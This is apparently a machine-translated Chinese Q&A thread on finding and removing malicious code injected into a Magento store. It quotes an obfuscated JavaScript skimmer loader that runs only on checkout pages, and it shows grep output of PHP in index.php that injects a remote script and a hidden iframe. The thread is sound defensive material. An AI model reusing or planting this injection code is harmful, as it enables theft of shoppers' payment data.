我有一个恶意脚本被插入身体标记之后,我不知道要删除它的文件,我已经检查了管理员以及模板文件中的任何地方,它不在哪里被发现。该病毒看起来是这样的:如何删除Magento中body标签之后插入的脚本?
if((new
RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('>tpircs/<>"sj.tekramroced/crs/knil.sj-
knil//:sptth"=crs tpircs<'.split("").reverse().join(""))};
请尝试以下方法
我会推荐以下方法为在Magento除去第三方脚本:
>接近1请去你的主题app/design/frontend/Yourtheme/default/template/page/,open在清除缓存并检查您的商店后,查看文件并查找此代码和评论。
<?php echo $this->getAbsoluteFooter() ?>
1column.phtml
2columns-left.phtml
2columns-right.phtml
3columns.phtml
所有其他代码来getAbsoluteFooter下()函数,
>方法2: GO管理面板一般>设计>尾>其他HTML
>方法3:转到local.xml中/ page.xml文件,并检查这下面的代码,可能是在同一文件中加入这样的
<block type="core/text_list" name="after_body_start" as="after_body_start" translate="label">
<label>Page Top</label>
希望这对你有帮助。
只要知道脚本的名称是什么,就很容易摆脱这些恶意脚本。
我有很多这些脚本注入我的网站,其中大多数是脚本和iframe指向域http://siteverification.online。
我不是一个Magento的专家,但我想,那么只能来自两个地方:
对于数据库,我使用MySQL,并且因为我安装了PhpMyAdmin,所以我利用它的Search函数,该函数可以搜索数据库所有表的所有字段。我刚刚搜索了siteverification.online,发现了一些条目,并将其删除。
对于文件系统,我登录通过SSH,只是搜索整个网站的Magento文件系统,就像这样:
$ grep -r "siteverification.online" /var/www/magento-project
./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
对我来说,事实证明,一些PHP代码在index.php注入。但是如果代码被注入到任何其他的php或html文件中,这将会发现它们,因为搜索是递归的(-r标志)。
就是这样。我甚至都不了解Magento的文件系统和数据库结构,但是使用这些激进的搜索方法,我在几分钟内摆脱了所有的恶意软件。
你是否在其他代码中检查过它?在管理面板中? –
杂项HTML位于'system-> configuration-> design-> footer-> Miscellaneous'下的杂项HTML'检查这可能是'code/virus' located there –